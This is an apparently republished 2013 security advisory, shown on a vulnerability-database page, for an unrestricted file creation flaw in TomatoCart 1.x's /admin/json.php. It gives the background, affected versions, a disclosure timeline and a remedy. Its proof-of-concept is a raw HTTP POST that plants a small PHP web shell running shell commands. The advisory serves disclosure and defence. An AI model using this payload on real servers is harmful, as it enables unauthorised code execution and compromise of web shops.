Lucene search
+L

TomatoCart 1.x Unrestricted File Creation

🗓️ 04 Jan 2013 00:00:00Reported by Aung KhantType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 39 Views

TomatoCart 1.x Unrestricted File Creation vulnerability in /admin/json.php allowing arbitrary shell script creatio

Code
`1. OVERVIEW  
  
TomatoCart 1.x versions are vulnerable to Unrestricted File Creation.  
  
  
2. BACKGROUND  
  
TomatoCart is an innovative Open Source shopping cart solution  
developed by Wuxi Elootec Technology Co., Ltd. It is forked from  
osCommerce 3 as a separate project and is released under the GNU  
General Public License V2. Equipped with the web2.0 Technology Ajax  
and Rich Internet applications (RIAs), TomatoCart Team is devoted to  
building a landmark eCommerce solution.  
  
  
3. VULNERABILITY DESCRIPTION  
  
TomatoCart 1.x versions contain a flaw related to the /admin/json.php  
script's failure to properly restrict created files. This may allow an  
attacker to create arbitrary shell script to launch further attacks on  
the application server.  
  
  
4. VERSIONS AFFECTED  
  
Tested on 1.1.8, 1.1.5  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
/////////////////////////////////////////////////////////////////////  
POST /admin/json.php HTTP/1.1  
Host: localhost  
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 195  
  
module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo  
'<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>  
///////////////////////////////////////////////////////////////  
  
  
6. SOLUTION  
  
The vendor did not show commitment in hardening the application.  
It is recommended to use alternative shopping cart application with  
good track record of security fixes.  
  
  
7. VENDOR  
  
Wuxi Elootec Technology Co., Ltd.  
  
  
8. CREDIT  
  
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2012-04-22: Contacted the vendor through email  
2012-04-29: Vendor replied and the vulnerability detail was sent  
2013-01-04: Vulnerability not fixed  
2013-01-04: Vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation  
TomatoCart Home Page: http://www.tomatocart.com/  
  
#yehg [2013-01-04]  
  
---------------------------------  
Best regards,  
YGN Ethical Hacker Group  
Yangon, Myanmar  
http://yehg.net  
Our Lab | http://yehg.net/lab  
Our Directory | http://yehg.net/hwd  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation